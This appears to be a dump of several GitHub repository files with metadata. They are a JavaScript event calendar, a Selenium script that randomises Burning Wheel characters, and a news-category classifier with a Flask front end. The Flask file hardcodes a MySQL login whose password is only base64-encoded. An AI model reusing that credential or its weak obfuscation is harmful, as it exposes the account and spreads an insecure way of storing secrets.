Evnt_calendar_line built above into Evnt_target_box.\n\t\t\t\t} else if (i == FinishDate_Date) {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.textContent = this.dayname + '종료';\n\t\t\t\t\t// the cell at the end date gets the event's name followed by '종료' (ended).\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t} else {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t\t\t// create a div tag whose class name is the event name.\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.innerText = ' ';\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t} // end of else\n\t\t\t} // end of the for loop\n\t\t} // end of else\n\n\t} // end of the calendar function\n\n\n\n\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//Evnt_Pop function : when an event is clicked on the calendar, 'on' is appended to its class name.\n\t// clicking it again removes the 'on'.\n\t// while 'on' is attached, a div tag is created so the related information can be 
viewed.\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\n\n\n\tEvnt_Pop = function() {\n\t\tif (this.classList == 'Evnt_calendar_line' || this.classList == 'Event_cntnt_line') {\n\t\t\tvar Evnt_popup_id = this.getAttribute('id')\n\t\t\tconsole.log(Evnt_popup_id);\n\t\t\t// the reason for getAttribute on the id is to pull in the image with the same name.\n\t\t\t// to pull the image in, models.py really has to be learned.\n\t\t\tthis.classList.add('on');\n\t\t\t// here, this means the DOM element in question.\n\t\t\tEvnt_popup = document.createElement('div');\n\t\t\tEvnt_popup.setAttribute('class', 'Evnt_popup');\n\t\t\t// Evnt_popup.innerHTML = 'Choco Hyme'\n\t\t\tthis.appendChild(Evnt_popup);\n\n\t\t\tEvnt_popup_cntnt = document.createElement('div');\n\t\t\tEvnt_popup_cntnt.setAttribute('class', 'Evnt_popup_cntnt');\n\t\t\t// Evnt_popup_cntnt.innerHTML = Evnt_popup_id\n\t\t\tEvnt_popup.appendChild(Evnt_popup_cntnt);\n\n\t\t\tEvnt_popup_cntnt_image = document.createElement('img');\n\t\t\tEvnt_popup_cntnt_image.setAttribute('class', 'Evnt_popup_cntnt_image');\n\t\t\t// Evnt_popup_id_by_model = {{EventSets.get(dayname=Evnt_popup_id).url}}\n\t\t\t// Evnt_popup_cntnt_image.src = '{{EventSets.get(dayname=\"'+Evnt_popup_id+'\").image.url}}'\n\t\t\tEvnt_popup_cntnt_image.src = '../media/' + Evnt_popup_id + '.jpg';\n\t\t\tEvnt_popup_cntnt_image.alt = '사진없음'\n\t\t\tEvnt_popup_cntnt.appendChild(Evnt_popup_cntnt_image);\n\t\t} else if (this.classList == 'Evnt_calendar_line on' || this.classList == 'Event_cntnt_line on') {\n\t\t\tthis.classList.remove('on');\n\t\t\tEvnt_popup.remove();\n\t\t}\n\t}\n}\n\n// while one event popup is open, another event popup can still be opened.\n\n// ------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n\n// let's send an XMLHttpRequest via AJAX.\nlet Events = new Array();\n\nfunction LoadEventSet() {\n\tlet url = '/api/eventset';\n\tvar req = new XMLHttpRequest();\n\treq.open('GET', url);\n\treq.onreadystatechange = function() {\n\t\tif (this.readyState == 4 && this.status == 200) {\n\t\t\tvar jsonResponse = JSON.parse(req.responseText);\n\t\t\tvar data = jsonResponse['data']\n\n\t\t\tfor (let i = 0; i < data.length; i++) {\n\t\t\t\t//TODO: build EventSet objects and push them into the Array.\n\t\t\t\tconsole.log(data[i][\"day\"], data[i][\"lastday\"], data[i][\"dayname\"])\n\t\t\t\tlet eventset = new EventSet(\n\t\t\t\t\tdata[i][\"day\"],\n\t\t\t\t\tdata[i][\"lastday\"],\n\t\t\t\t\tdata[i][\"dayname\"],\n\t\t\t\t);\n\n\t\t\t\tEvents.push(eventset)\n\t\t\t\t// console.log(Events)\n\t\t\t}\n\n\t\t\tEvents.sort(function(a, b) {\n\t\t\t\tvar former = new Date(a.day);\n\t\t\t\tvar latter = new Date(b.day);\n\t\t\t\treturn former.getTime() - latter.getTime();\n\t\t\t});\n\n\t\t\t// the sort function below works on the evals whose span is 2 days or more,\n\t\t\t// and makes the longer evals fill the upper 
lines first.\n\t\t\tEvents.sort(function(a, b) {\n\t\t\t\tvar former_firstday = new Date(a.day);\n\t\t\t\tvar former_lastday = new Date(a.lastday);\n\t\t\t\tvar former_period = former_lastday.getTime() - former_firstday.getTime();\n\n\t\t\t\tvar latter_firstday = new Date(b.day);\n\t\t\t\tvar latter_lastday = new Date(b.lastday);\n\t\t\t\tvar latter_period = latter_lastday.getTime() - latter_firstday.getTime();\n\n\t\t\t\treturn latter_period - former_period;\n\t\t\t});\n\n console.log(Events)\n\t\t\tif (document.getElementById(\"Event_cntnt_box\") !== null) {\n\t\t\t\tfor (i = 0; i < Events.length; i++) {\n\t\t\t\t\tEvents[i].write_del();\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tfor (i = 0; i < Events.length; i++) {\n\t\t\t\t\tEvents[i].calendar();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treq.send();\n}\n\nLoadEventSet();\n\n// the first sort above is the one that puts evals with earlier start dates first.\n\n/////////////////////////////////////////////////////////////////////\n/////////////////////////////////////////////////////////////////////\n////////////////////// Sorting the variables ////////////////////////\n/////////////////////////////////////////////////////////////////////\n/////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.6748992204666138, "alphanum_fraction": 0.6849798560142517, "avg_line_length": 30, "blob_id": "a4440be5e243968b00c77013f78a341e7a3aa752", "content_id": "24c2a723e9e14f15c2a1a78ff9e6b6e07bbd52f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/dot/static/dot/js/Date.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "// input the date and the day of the week\nvar today = new Date();\n // define the today variable using the Date object\nvar today_year = today.getFullYear();\n // use the getFullYear() method to get the current year into a variable.\nvar today_date = today.getDate();\n // use the getDate() method to get the day of the month into a variable.\nvar today_month = today.getMonth()+1;\n // use the getMonth() method to get the month into a variable.\n // Caution! 
the getMonth() method returns the month as 0 ~ 11.\nvar next_month = today.getMonth()+2;\n\nvar today_day = today.getDay();\n\n// use the getDay() method to get the day of the week as a number\n// 0 (Sunday) ~ 6 (Saturday)\n// Sunday's value is 0, so subtracting 1 from it gives undefined.\n// therefore, redefine it as Sunday via a conditional.\n\nvar week = ['일','월','화','수','목','금','토',];\nvar weekEng = ['sun','mon','tue','wed','thu','fri','sat',];\n\n// define week_numb; if slot 6 (Sunday) of the previous week_numb already has\n// its innerHtml filled, increase week_numb.\n\nvar ThisFirst = new Date(today_year, today_month-1, 1);\n// assign the first day of this month to ThisFirst.\nvar ThisLast = new Date(today_year, today_month, 0);\n// assign the last day of this month to ThisLast.\n\nvar PrevFirst = new Date(today_year, today_month-2,1);\n// assign the first day of last month to PrevFirst.\nvar PrevLast = new Date(today_year, today_month-1,0);\n// assign the last day of last month to PrevLast.\n\nvar NextFirst = new Date(today_year, today_month,1);\n// assign the first day of next month to NextFirst.\nvar NextLast = new Date(today_year, today_month+1,0);\n// assign the last day of next month to NextLast.\n\n\nvar TFDate = ThisFirst.getDate(); // get ThisFirst's day of the month.\nvar TFDay = ThisFirst.getDay(); // get ThisFirst's day of the week.\n\nvar TLDate = ThisLast.getDate(); // get ThisLast's day of the month.\nvar TLDay = ThisLast.getDay(); // get ThisLast's day of the week.\n\nvar PFDate = PrevFirst.getDate(); // get PrevFirst's day of the month.\nvar PFDay = PrevFirst.getDay(); // get PrevFirst's day of the week.\n\nvar PLDate = PrevLast.getDate(); // get PrevLast's day of the month.\nvar PLDay = PrevLast.getDay(); // get PrevLast's day of the week.\n\nvar NFDate = NextFirst.getDate(); // get NextFirst's day of the month.\nvar NFDay = NextFirst.getDay(); // get NextFirst's day of the week.\n\nvar NLDate = NextLast.getDate(); // get NextLast's day of the month.\nvar NLDay = NextLast.getDay(); // get NextLast's day of the week.\n\n// start of the EventSet function definition\n" } ]
11
spoonpaw/burning-wheel-random-character-generator
https://github.com/spoonpaw/burning-wheel-random-character-generator
d3ed033295702c0fedb55b4aa0b24edab875f44d
acf897ee0e9cd2582b1d800a23af4e4cf0b79a69
5caad67d17671bca97d04b0990ffa3691b4ee363
refs/heads/master
2022-12-09T02:17:57.596830
2020-09-05T01:41:59
2020-09-05T01:41:59
292,788,037
3
1
null
null
null
null
null
[ { "alpha_fraction": 0.49733081459999084, "alphanum_fraction": 0.5062019228935242, "avg_line_length": 42.17966079711914, "blob_id": "dc7dd7c777d89626aa3451e75d8a975c302e17df", "content_id": "4b7c71d8bc1a56d13d295813d2385e1adb48274e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12738, "license_type": "no_license", "max_line_length": 121, "num_lines": 295, "path": "/charredBlackRandomizer.py", "repo_name": "spoonpaw/burning-wheel-random-character-generator", "src_encoding": "UTF-8", "text": "from webdriver_manager.chrome import ChromeDriverManager\nimport pyinputplus as pyip\nimport sys\nfrom selenium import webdriver\nimport time\nimport random\nimport pyautogui\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom selenium.webdriver.support.select import Select\n\ncontinueRun = True\n\nwhile continueRun:\n try:\n if raceChoice is not None:\n pass\n else:\n raceChoice = None\n except NameError:\n pass\n try:\n if lifePathNum is not None:\n pass\n else:\n lifePathNum = None\n except NameError:\n pass\n try:\n if genderNum is not None:\n pass\n else:\n genderNum = None\n except NameError:\n pass\n try:\n if lifePathNumber is not None:\n pass\n else:\n lifePathNumber = None\n except NameError:\n pass\n editMode = True\n while editMode:\n print('select a parameter to edit')\n print('1 - race')\n print('2 - number of lifepaths')\n print('3 - gender')\n print('4 - generate')\n print('5 - parameters so far')\n print('0 - exit')\n editChoiceInputNumber = pyip.inputNum()\n if editChoiceInputNumber < 0 or editChoiceInputNumber > 5:\n print('please enter a number between 1 and 5')\n continue\n elif editChoiceInputNumber == 0:\n sys.exit()\n elif editChoiceInputNumber == 1:\n raceEditMode = True\n while raceEditMode:\n print('select a race')\n print('1 - man')\n print('2 - dwarf')\n print('3 - elf')\n print('4 - orc')\n print('5 - roden')\n print('6 - great wolf')\n print('7 - troll')\n print('0 - exit')\n raceChoice = pyip.inputNum()\n if raceChoice < 0 or raceChoice > 7:\n print('please enter a number between 1 and 7')\n continue\n elif raceChoice == 0:\n sys.exit()\n elif raceChoice == 1:\n print('man chosen. would you like to make further adjustments? (y/n)')\n raceName = 'man'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 2:\n print('dwarf chosen. would you like to make further adjustments? (y/n)')\n raceName = 'dwarf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 3:\n print('elf chosen. would you like to make further adjustments? (y/n)')\n raceName = 'elf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 4:\n print('orc chosen. would you like to make further adjustments? (y/n)')\n raceName = 'orc'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 5:\n print('roden chosen. would you like to make further adjustments? (y/n)')\n raceName = 'roden'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 6:\n print('great wolf chosen. 
would you like to make further adjustments? (y/n)')\n raceName = 'great wolf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 7:\n print('troll chosen. would you like to make further adjustments? (y/n)')\n raceName = 'troll'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n\n elif editChoiceInputNumber == 2:\n lifePathEditMode = True\n while lifePathEditMode:\n print('please enter the number of lifepaths you wish for your character to have')\n lifePathNumber = pyip.inputNum()\n if lifePathNumber <= 0:\n print('please enter a positive integer')\n continue\n print(f'{lifePathNumber} lifepaths chosen. would you like to make further adjustments? (y/n)')\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n lifePathEditMode = False\n else:\n lifePathEditMode = False\n editMode = False\n elif editChoiceInputNumber == 3:\n genderPathEditMode = True\n while genderPathEditMode:\n print('please pick a gender.')\n print('1 - female')\n print('2 - male')\n genderNum = pyip.inputNum()\n if genderNum < 1 or genderNum > 2:\n print('please enter 1 or 2')\n continue\n if genderNum == 1:\n genderName = 'female'\n print(\"you've chosen female. would you like to make further adjustments? (y/n)\")\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n genderPathEditMode = False\n else:\n genderPathEditMode = False\n editMode = False\n if genderNum == 2:\n genderName = 'male'\n print(\"you've chosen male. would you like to make further adjustments? (y/n)\")\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n genderPathEditMode = False\n else:\n genderPathEditMode = False\n editMode = False\n\n elif editChoiceInputNumber == 5:\n print(f'race = {raceName}')\n print(f'number of lifepaths = {lifePathNumber}')\n print(f'gender = {genderName}')\n print('press enter to continue')\n input()\n elif editChoiceInputNumber == 4:\n editMode = False\n break\n generateMode = True\n while generateMode is True:\n driver = webdriver.Chrome(ChromeDriverManager().install())\n driver.implicitly_wait(3)\n driver.get('http://charred-black.herokuapp.com/#/')\n raceSelector = driver.find_element_by_css_selector('#collapse_first > div > div > div > div:nth-child(5) > '\n 'select')\n try:\n if raceChoice is None:\n raceNumber = random.randint(1, 7)\n else:\n raceNumber = raceChoice\n except NameError:\n raceNumber = random.randint(1, 7)\n print(f'raceNumber = {raceNumber}')\n raceSelector2 = Select(driver.find_element_by_xpath('//*[@id=\"collapse_first\"]/div/div/div/div[5]/select'))\n if raceNumber == 1:\n raceSelector2.select_by_value('man')\n elif raceNumber == 2:\n raceSelector2.select_by_value('dwarf')\n elif raceNumber == 3:\n raceSelector2.select_by_value('elf')\n elif raceNumber == 4:\n raceSelector2.select_by_value('orc')\n elif raceNumber == 5:\n raceSelector2.select_by_value('roden')\n elif raceNumber == 6:\n raceSelector2.select_by_value('wolf')\n elif raceNumber == 7:\n raceSelector2.select_by_value('troll')\n genderSelector = driver.find_element_by_css_selector('#collapse_first > div > div > div > div:nth-child(8) > '\n 'select')\n try:\n if genderNum is None:\n genderNumber = random.randint(1, 2)\n else:\n genderNumber = genderNum\n except NameError:\n genderNumber = random.randint(1, 2)\n print(f'genderNumber = {genderNumber}')\n if genderNumber > 1:\n 
genderSelector2 = Select(driver.find_element_by_xpath('//*[@id=\"collapse_first\"]/div/div/div/div[8]/select'))\n genderSelector2.select_by_value('male')\n else:\n pass\n try:\n if lifePathNumber is None:\n lifePathQuantity = random.randint(4, 6)\n else:\n lifePathQuantity = lifePathNumber\n except NameError:\n lifePathQuantity = random.randint(4, 6)\n print(f'lifepath quantity = {lifePathQuantity}')\n for i in range(0, lifePathQuantity):\n settingSelector = driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[1]/select''')\n allSettings = settingSelector.find_elements_by_tag_name(\"option\")\n print(f'number of settings available = {len(allSettings)}')\n settingNum = random.randint(1, len(allSettings))\n print(f'settingNum = {settingNum}')\n setting = Select(driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[1]/select'''))\n setting.select_by_value(str(settingNum - 1))\n lifePathSelector = driver.find_element_by_xpath(\n '''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[2]/select''')\n allLifepaths = lifePathSelector.find_elements_by_tag_name(\"option\")\n print(f'number of lifepaths available = {len(allLifepaths)}')\n lifePathNum = random.randint(1, len(allLifepaths))\n print(f'lifePathNum = {lifePathNum}')\n lifepath = Select(\n driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[2]/select'''))\n lifepath.select_by_value(str(lifePathNum - 1))\n addLifePathButton = driver.find_element_by_css_selector(\n '#collapse_lp > div > div.container > div:nth-child(1) > div.col-md-1 > a')\n try:\n addLifePathButton.click()\n except ElementClickInterceptedException:\n for m in range(0, 15):\n pyautogui.press('tab')\n pyautogui.press('enter')\n addLifePathButton.click()\n # collapse_lp > div > div.container > div:nth-child(1) > div:nth-child(1) > select\n\n # count = len(Select(settingSelector).options)\n # print(count)\n driver.find_element_by_css_selector('#collapse_stats > div > div > div:nth-child(3) > div > button').click()\n characterFinished = True\n while characterFinished == True:\n print('character complete. do you want to make a new character?')\n print('1 - yes, use the same parameters')\n print('2 - no, please start over from the beginning')\n finishedCharacterInput = pyip.inputNum()\n if finishedCharacterInput < 1 or finishedCharacterInput > 2:\n print('please enter 1 or 2')\n continue\n elif finishedCharacterInput == 2:\n raceChoice = None\n lifePathNum = None\n genderNum = None\n lifePathNumber = None\n characterFinished = False\n generateMode = False\n break\n elif finishedCharacterInput == 1:\n characterFinished = False\n break\n" }, { "alpha_fraction": 0.8218181729316711, "alphanum_fraction": 0.8254545331001282, "avg_line_length": 29.55555534362793, "blob_id": "c4eec347f774a7f97aaf503cf4ac69af505ca3b3", "content_id": "ce945eae3796cb153f9ce2d670e80e413911a40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 275, "license_type": "no_license", "max_line_length": 103, "num_lines": 9, "path": "/README.md", "repo_name": "spoonpaw/burning-wheel-random-character-generator", "src_encoding": "UTF-8", "text": "# burning-wheel-random-character-generator\nthis script will open the charred black burning wheel character creator and generate a random character\n\nit needs python 3 to run\nit also requires a few modules that can be installed with pip:\n\npyinputplus\nselenium\npyautogui\n" } ]
2
agammsantos/Final-Project-JCDS
https://github.com/agammsantos/Final-Project-JCDS
7a6860f73fd5173d62cdf2658d48a86d7e616cb3
72aecec416b81588325770ccbe073c2011f2e65d
a84d659e4e24e61554ef881ed92ed7744413d2d3
refs/heads/master
2022-02-05T11:47:01.097422
2019-07-23T00:14:40
2019-07-23T00:14:40
198,082,489
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7593201994895935, "alphanum_fraction": 0.7727521657943726, "avg_line_length": 66.5740737915039, "blob_id": "6614ace1058ee1f59cd89fee7fcc9bffcc2963e4", "content_id": "5063c28870ebc22c302b1b57cdaca70f09bcc571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3653, "license_type": "no_license", "max_line_length": 638, "num_lines": 54, "path": "/readme.md", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "![purwadhikaLogo](https://d1ah56qj523gwb.cloudfront.net/uploads/organizations/logos/1538557444-kcgv11HXelvcOnlyrGcEpfwAf6hbPMhC.png)\n\n# News Category Predictor - Purwadhika Job Connector Data Science Batch 04 Final Project\n\nNews are the window of the world. They keep us updated on what's happening around us every day. With how the stream of news are going around nowadays, some category of news might interest us, while others might not. Of course, in order to save time, you probably want to know what kind of news you are about to read, though i myself doubt that. But in case you do, News Category Predictor can help you on trying to figure out which category does the news belong to by analyzing its headline and short description. Further applications such as filtering news with a web-scrapping program and recommendations by category are possible feats.\n\n**This simple project is made to show a prediction of news category and serve it along with confidence statement as well as probability plot**\n\nThis project falls into the topic of classification with machine learning model.\nThe dataset used for model training is obtainable from [kaggle.com](https://www.kaggle.com/rmisra/news-category-dataset).\n3 machine learning models were used and compared through, they are: \n\n1. Multinomial Naive Bayes Method\n2. Complement Naive Bayes Method\n3. Stochastic Gradient Descent Method\n\nAfter comparing the three models, Complement Naive Bayes Method was chosen to be the one processing all the news data up until the prediction on the front-end interface which was made with the help of [Flask](https://palletsprojects.com/p/flask/) and other miscellaneous things.\n\nAs the preparation, the dataset were all analyzed, cleaned, and plotted with the help of [Pandas](https://pandas.pydata.org/) and [Matplotlib](https://matplotlib.org/). The model were dumped using joblib by *newsmodel.py*. Further on, the barplot which is available on the prediction page were made by utilizing [Seaborn](https://seaborn.pydata.org/)\n\nHere is the collection of Histograms which were being plot by *newsplot.py*:\n![Histo1](./histogramh.png)\n![Histo2](./histogramd.png)\n![Histo3](./histogramf.png)\n\n**How to run the Web App**\n1. Clone/download this repo.\n2. Open *newsflask.py*.\n3. To include the data export to MySQL, make sure you have the same account profile and database, or just delete lines that have to do with MySQL syntax.\n4. Run *newsflask.py*.\n5. 
The server will run on localhost:5000, which brings you to the homepage:\n ![Home](./home.png)\n This page serves as the landing page with a few navigation buttons such as:\n - News Category Predictor: Takes you to the same page.\n - Categories / List of Categories: Scrolls the page down to the categories section, which tells you the categories available for predicting.\n - Start Predicting: Scrolls the page down to the predicting section, which is the main feature of the project.\n\n Categories:\n ![Categories1](./cat1.png)\n ![Categories2](./cat2.png)\n\n Start Prediction:\n ![Start](./start.png)\n\n6. After you fill in the required features, click on Predict Category; it will bring you to the prediction result page with a Back button:\n ![Result](./prediction.png)\n Note that the news headline and description used for this result were taken from [60secondsnow.com](https://www.60secondsnow.com/).\n\nMySQL is used only to store the prediction data the user has input through the homepage's Predicting Category section. A *404 Error* page is also included in the templates.\n\n___\n### I really hope this project could be of any use to you. Corrections and further applications are very welcome 😊\n\n#### ✉ [email protected]_" }, { "alpha_fraction": 0.7240291237831116, "alphanum_fraction": 0.7271844744682312, "avg_line_length": 44.27472686767578, "blob_id": "e6079cf0c51267af71f1548792aa33caedd4ec88", "content_id": "3cc3764b0f220af6076a18b29b0d163ef73e0050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4120, "license_type": "no_license", "max_line_length": 127, "num_lines": 91, "path": "/newsmodel.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import ComplementNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport joblib as jb\n\n\ndata=pd.read_json('News_Category_Dataset_v2.json',lines=True)\n# print(data[data['headline'].isnull()==True])\n# print(data[data['short_description'].isnull()==True])\n# print(data.columns.values)\n# print(data['category'].value_counts())\n\ndata.category = data.category.map(lambda x: \"ARTS & CULTURE\" if x == \"ARTS\" or x == \"CULTURE & ARTS\" else x)\ndata.category = data.category.map(lambda x: \"WEIRD NEWS & COMEDY\" if x == \"COMEDY\" or x == \"WEIRD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"BUSINESS\" if x == \"MONEY\" else x)\ndata.category = data.category.map(lambda x: \"EDUCATION\" if x == \"COLLEGE\" else x)\ndata.category = data.category.map(lambda x: \"HOME & LIVING\" if x == \"HEALTHY LIVING\" or x == \"WELLNESS\" or x == \"FIFTY\" else x)\ndata.category = data.category.map(lambda x: \"PARENTS\" if x == \"PARENTING\" else x)\ndata.category = data.category.map(lambda x: \"IMPACT\" if x == \"GOOD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"ENVIRONMENT\" if x == \"GREEN\" else x)\ndata.category = data.category.map(lambda x: \"STYLE & BEAUTY\" if x == \"STYLE\" else x)\ndata.category = data.category.map(lambda x: \"FOOD & DRINK\" if x == \"TASTE\" else x)\ndata.category = data.category.map(lambda x: \"SCIENCE & TECH\" if x == \"SCIENCE\" or x == \"TECH\" else x)\ndata.category = data.category.map(lambda x: \"WORLD NEWS\" if x 
== \"THE WORLDPOST\" or x == \"WORLDPOST\" else x)\nprint(data['category'].value_counts())\n# print(data['features'][data['category']=='COMEDY'])\n# print(data['features'][data['category']=='WEIRD NEWS'])\n# data=data.drop(data[data['category']=='GOOD NEWS'].index.values)\n# data=data.drop(data[data['category']=='IMPACT'].index.values)\n\ndata['features']=data['headline']+' '+data['short_description']\ndata['features']=data['features'].apply(lambda x: x.lower())\ndata['hwlen'] = data['headline'].apply(lambda x: x.split(' ')).apply(len)\ndata['dwlen'] = data['short_description'].apply(lambda x: x.split(' ')).apply(len)\ndata['fwlen'] = data['features'].apply(lambda x: x.split(' ')).apply(len)\ndata.to_csv(r'news.csv')\n# print(data['features'].head())\n# print(data['fwlen'].max())\n\n\nx = data['features']\ny = data['category']\nxtr, xts, ytr, yts = train_test_split(x, y, test_size=.05, random_state=42)\n\nmultinomialPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',MultinomialNB())\n])\nmultinomialPipeline.fit(xtr,ytr)\nmultinomialPrediksi = multinomialPipeline.predict(xts)\n\ncomplementPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',ComplementNB())\n])\ncomplementPipeline.fit(xtr,ytr)\ncomplementPrediksi = complementPipeline.predict(xts)\n\nsgdcPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',SGDClassifier(loss='hinge', penalty='l2',alpha=1e-3, random_state=42, max_iter=5, tol=1e-3))\n])\nsgdcPipeline.fit(xtr,ytr)\nsgdcPrediksi = sgdcPipeline.predict(xts)\n\nprint('Dengan metode MultinomialNB, diperoleh: ')\nprint(classification_report(yts,multinomialPrediksi))\nprint(confusion_matrix(yts,multinomialPrediksi))\nprint('\\n')\nprint('Dengan metode ComplementNB, diperoleh: ')\nprint(classification_report(yts,complementPrediksi))\nprint(confusion_matrix(yts,complementPrediksi))\nprint('\\n')\nprint('Dengan metode Stochastic Gradient Descent, diperoleh: ')\nprint(classification_report(yts,sgdcPrediksi))\nprint(confusion_matrix(yts,sgdcPrediksi))\n\nhead = \"Tiger Woods misses Open cut, yearns for 'hot weeks'\"\ndesc = 'Tiger Woods missed the cut in the Open Championship at Royal Portrush'\nfeat = head+' '+desc\nprint(complementPipeline.predict([feat]))\nprint(complementPipeline.predict_proba([feat]))\nprint(complementPipeline.score(xtr,ytr))\n\njb.dump(complementPipeline, 'modelComplement')\n" }, { "alpha_fraction": 0.6500852704048157, "alphanum_fraction": 0.6722569465637207, "avg_line_length": 34.189998626708984, "blob_id": "be89c03734b00e698e827cb14de2916564d89c1e", "content_id": "a0cd90206691a4b3df10aee8459341018e6a93fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3518, "license_type": "no_license", "max_line_length": 148, "num_lines": 100, "path": "/newsflask.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom flask import Flask, render_template, request\nfrom flask_mysqldb import MySQL \nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport base64\nimport io\nimport joblib as jb\n\napp=Flask(__name__,static_url_path='/static')\nmysql=MySQL(app)\n\napp.config['MYSQL_HOST']='localhost'\napp.config['MYSQL_USER']='agammsantos'\napp.config['MYSQL_PASSWORD']=base64.b64decode(b\"RGFuY2VyMTE5OQ==\").decode('utf-8')\napp.config['MYSQL_DB']='news'\n\[email protected]('/')\ndef home():\n return render_template('land.htm')\n\[email 
@app.route('/prediksi', methods=['POST'])\ndef predict():\n head=str(request.form['head']).lower()\n desc=str(request.form['desc']).lower()\n feature=head+' '+desc\n \n prediksi=model.predict([feature])[0]\n prediksi_l=prediksi.lower().split(' ')\n prediksi_u=[]\n for i in prediksi_l:\n prediksi_u.append(i[0].upper()+i[1:])\n kategori=' '.join(prediksi_u)\n \n probabilitas=model.predict_proba([feature])\n enumprob=list(enumerate(probabilitas[0]))\n enumprob.sort(key=lambda x:x[1],reverse=True)\n probutama=enumprob[:5]\n\n df=pd.read_csv('news.csv')\n sortedlist=df['category'].unique()\n sortedlist.sort()\n \n plotkategori=[]\n plotprob=[]\n for i in probutama:\n plotkategori.append(sortedlist[i[0]])\n plotprob.append(i[1]*100)\n\n plt.close()\n sns.set(style=\"darkgrid\")\n sns.set_context(\"talk\")\n ax=sns.barplot(plotprob,plotkategori,palette=\"Blues_d\")\n ax.set(xlabel='Probability (%)',ylabel='')\n plotlist=[(plotprob[i],plotkategori[i]) for i in range(0,len(plotprob))]\n xticks=np.arange(0,101,20)\n index=0\n for a,b in plotlist:\n 